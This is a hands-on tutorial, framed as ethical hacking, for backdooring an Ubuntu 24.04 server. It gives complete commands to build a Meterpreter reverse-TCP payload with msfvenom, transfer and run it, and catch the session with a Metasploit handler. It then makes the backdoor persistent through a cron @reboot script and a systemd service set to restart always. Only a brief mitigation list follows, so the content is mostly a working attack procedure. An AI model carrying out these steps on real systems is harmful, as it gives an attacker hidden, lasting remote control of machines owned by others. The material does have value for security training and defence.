Hands-on: Installing a Backdoor and Persistence Techniques on a Target System (en)
Installing a backdoor and using persistence techniques on an Ubuntu 24.04 server is an important part of ethical hacking to understand how attackers can gain sustained access to a system. Below are detailed steps and hands-on example techniques for installing a backdoor and maintaining access on an Ubuntu 24.04 Server.
1. Installing a Backdoor Using Metasploit
The Metasploit Framework is an effective tool for installing a backdoor. We will use a Metasploit exploit to install a backdoor on the server.
Steps:
Preparation:
- Run Kali Linux and open Metasploit with the command:
msfconsole
Create a Payload:
- Create a backdoor payload (e.g., reverse shell) that will run on the Ubuntu server. Use msfvenom to create the payload file.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your_IP LPORT=your_PORT -f elf > backdoor.elf
- The LHOST parameter is the IP of the attacking machine, and LPORT is the port that will be used for communication.
Transfer Payload to Ubuntu Server:
- Use scp to transfer the payload to the Ubuntu 24.04 server.
scp backdoor.elf user@server_IP:/tmp/
Run Payload on Ubuntu Server:
- Once the payload is on the server, change the permissions and execute it:
chmod +x /tmp/backdoor.elf /tmp/backdoor.elf
Run Handler on Kali Linux:
- Set up a handler in Metasploit to catch the connection from the server:
use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST your_IP set LPORT your_PORT exploit
Access Meterpreter:
- If the payload was successfully executed, you will obtain a meterpreter session. Example basic commands:
meterpreter > sysinfo meterpreter > shell
2. Persistence Techniques
Once the backdoor is installed, persistence techniques are necessary for an attacker to regain access even after a system restart.
Example of Persistence Technique with Cron Job:
Create Backdoor Script:
- For example, create a bash script to run the backdoor automatically after a server reboot:
echo -e '#!/bin/bash\n/tmp/backdoor.elf' > /tmp/persist.sh chmod +x /tmp/persist.sh
Set Cron Job to Run Backdoor:
- Edit the user's crontab to run this script every time the system boots:
crontab -e
Add the following line to the crontab:
@reboot /tmp/persist.sh
Verify Cron Job:
- Ensure the cron job was successfully set by listing the cron jobs:
crontab -l
Example of Persistence Technique with Systemd:
Create Service File:
- Create a service file in /etc/systemd/system/:
sudo nano /etc/systemd/system/backdoor.service
- Add the following configuration:
[Unit] Description=Backdoor Service
[Service] ExecStart=/tmp/backdoor.elf Restart=always
[Install] WantedBy=multi-user.target
Enable and Start Service:
- Enable and start the service to ensure it runs automatically at boot:
sudo systemctl enable backdoor.service sudo systemctl start backdoor.service
Check Service Status:
- To see if the backdoor service is running:
sudo systemctl status backdoor.service
By using one or a combination of the techniques above, an attacker can maintain access to the server. In the context of ethical hacking, it is important to study this to understand how such attacks occur and what mitigation steps can be taken to prevent them.
Mitigation:
To prevent backdoors and persistence, several mitigation steps should be taken, including:
- Regularly checking for suspicious cron jobs.
- Checking for newly added services in systemd.
- Using IDS/IPS to detect unauthorized connections.
- Enabling audit logs to detect system configuration changes.